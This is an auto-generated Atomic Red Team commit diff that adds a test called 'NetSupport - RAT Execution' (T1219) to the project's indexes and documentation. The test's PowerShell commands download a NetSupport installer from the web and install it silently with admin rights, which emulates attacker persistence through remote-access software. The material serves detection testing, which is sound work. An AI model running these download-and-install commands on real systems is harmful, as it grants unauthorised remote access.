Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -1185,6 +1185,7 @@ command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Tes
 command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
 command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
 command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
+command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -860,6 +860,7 @@ command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Tes
 command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
 command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
 command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
+command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -1995,6 +1995,7 @@
   - Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
   - Atomic Test #6: Ammyy Admin Software Execution [windows]
   - Atomic Test #7: RemotePC Software Execution [windows]
+  - Atomic Test #8: NetSupport - RAT Execution [windows]
 - T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -1440,6 +1440,7 @@
   - Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
   - Atomic Test #6: Ammyy Admin Software Execution [windows]
   - Atomic Test #7: RemotePC Software Execution [windows]
+  - Atomic Test #8: NetSupport - RAT Execution [windows]
 - T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/index.yaml

@@ -87541,6 +87541,41 @@ command-and-control:
           -Name \"RPCService\" -force -erroraction silentlycontinue\n"
         name: powershell
         elevation_required: true
+    - name: NetSupport - RAT Execution
+      auto_generated_guid: ecca999b-e0c8-40e8-8416-ad320b146a75
+      description: "A recent trend by threat actors, once a foothold is established,
+        maintain long term persistence using third party remote services such as NetSupport
+        to provide the operator with access to the network using legitimate services.
+        \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        NetSupport_Path:
+          description: Path to the NetSupport executable.
+          type: Path
+          default: "$env:temp\\T1219Setup.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'NetSupport must be downloaded and exist on the disk at the specified
+          location. (#{NetSupport_Path})
+
+          '
+        prereq_command: 'if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: 'Start-BitsTransfer -Source "https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe"
+          -Destination "$env:temp\T1219Setup.exe" -dynamic
+
+          '
+      executor:
+        command: 'Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn"
+
+          '
+        cleanup_command: 'Stop-Process -Name "client32" -force -erroraction silentlycontinue
+
+          '
+        name: powershell
+        elevation_required: true
   T1079:
     technique:
       x_mitre_platforms:

atomics/T1219/T1219.md

@@ -22,6 +22,8 @@ Admin tools such as TeamViewer have been used by several groups targeting instit
 
 - [Atomic Test #7 - RemotePC Software Execution](#atomic-test-7---remotepc-software-execution)
 
+- [Atomic Test #8 - NetSupport - RAT Execution](#atomic-test-8---netsupport---rat-execution)
+
 
 <br/>
 
@@ -311,4 +313,53 @@ Start-BitsTransfer -Source "https://static.remotepc.com/downloads/rpc/140422/Rem
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - NetSupport - RAT Execution
+A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as NetSupport to provide the operator with access to the network using legitimate services.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ecca999b-e0c8-40e8-8416-ad320b146a75
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| NetSupport_Path | Path to the NetSupport executable. | Path | $env:temp&#92;T1219Setup.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn"
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name "client32" -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: NetSupport must be downloaded and exist on the disk at the specified location. (#{NetSupport_Path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Start-BitsTransfer -Source "https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe" -Destination "$env:temp\T1219Setup.exe" -dynamic
+```
+
+
+
+
 <br/>